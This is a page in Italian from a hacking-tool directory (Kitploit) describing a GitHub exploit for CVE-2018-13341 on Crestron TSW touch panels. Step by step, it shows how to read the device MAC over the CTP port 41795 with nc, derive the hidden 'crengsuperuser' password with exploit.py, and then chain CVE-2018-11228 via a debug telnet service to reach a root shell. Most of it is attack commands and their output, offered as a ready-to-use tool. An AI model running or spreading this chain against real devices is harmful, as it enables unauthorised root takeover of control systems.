Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-13341 — Questo strumento mira a sfruttare il CVE-2018-13341 | Kitploit
Strumenti/GitHubGitHub/rajchowdhury240/cve-2018-13341
Sicurezza Sistemi EmbeddedAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Hardware e IoT
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

Questo strumento mira a sfruttare il CVE-2018-13341

Vedi Repository
5 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-13341

Questo strumento mira a sfruttare la CVE-2018-13341; utilizzando l'indirizzo MAC del dispositivo target, è possibile recuperare la password dell'account nascosto "crengsuperuser" che ha privilegi elevati e consente di eseguire comandi SUDO.

Il protocollo Crestron Toolbox (CTP) può essere connesso accedendo alla porta 41795 sul dispositivo TSW-XX60.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

Requisiti

Questo strumento richiede il modulo CryptoGraphy.

root@kitploit:~
# pip3 install cryptography

OPPURE

root@kitploit:~
# pip3 install -r requirements.txt

Per Iniziare

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Esempio
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

Sfruttamento della CVE-2018-11228

La CVE-2018-11228 consente RCE non autenticata tramite il servizio Bash Shell nel protocollo Crestron Terminal (CTP). Dopo aver ottenuto la password dell'account nascosto "crengsuperuser", è possibile ottenere accesso root sulla macchina.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

Quindi, in una nuova shell, è possibile ottenere accesso root sulla macchina.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Crediti a: axcheron 
Scarica lo strumento